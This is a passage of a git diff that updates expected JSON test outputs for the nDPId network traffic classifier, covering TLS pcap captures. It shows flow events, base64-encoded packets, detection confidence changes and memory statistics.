+00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079191,"flow_last_seen":1626168079355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079905,"flow_last_seen":1626168080098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079937,"flow_last_seen":1626168080098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080539,"flow_last_seen":1626168080694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080569,"flow_last_seen":1626168080730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077750,"flow_last_seen":1626168077780,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168081935,"flow_last_seen":1626168081946,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00608{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168075993,"flow_last_seen":1626168077017,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip6","src_ip":"fe80::1059:a858:f9e7:cf94","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} 00622{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1626168074926,"flow_last_seen":1626168076790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4712,"flow_avg_l4_payload_len":362,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1626168074926,"flow_last_seen":1626168076790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4712,"flow_avg_l4_payload_len":362,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077735,"flow_last_seen":1626168077749,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":94,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077735,"flow_last_seen":1626168077749,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":94,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} 00582{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","packets-captured":315,"packets-processed":315,"total-skipped-flows":0,"total-l4-payload-len":95708,"total-not-detected-flows":1,"total-guessed-flows":1,"total-detected-flows":33,"total-detection-updates":26,"total-updates":0,"current-active-flows":0,"total-active-flows":35,"total-idle-flows":35,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":218,"global_ts_msec":1626168081946} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 315/315 @@ -224,9 +224,9 @@ ~~ total active/idle flows...: 35/35 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6026655 bytes -~~ total memory freed........: 6026655 bytes -~~ total allocations/frees...: 118687/118687 +~~ total memory allocated....: 6145257 bytes +~~ total memory freed........: 6145257 bytes +~~ total allocations/frees...: 121445/121445 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 2445 chars diff --git a/test/results/tls_cipher_lens.pcap.out b/test/results/tls_cipher_lens.pcap.out index 157eae0a0..04020ae4a 100644 --- a/test/results/tls_cipher_lens.pcap.out +++ b/test/results/tls_cipher_lens.pcap.out @@ -2,19 +2,19 @@ 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1391444859282} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mDAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAASAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google.it","ja3":"755cdaa3496eb8728247a639dee17aad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google.it","ja3":"755cdaa3496eb8728247a639dee17aad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mGAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhgD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mFAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhQD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mEAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"8eae3e18d36ce24c4ac6b9eeb84ac762","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"8eae3e18d36ce24c4ac6b9eeb84ac762","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mHAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAAAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 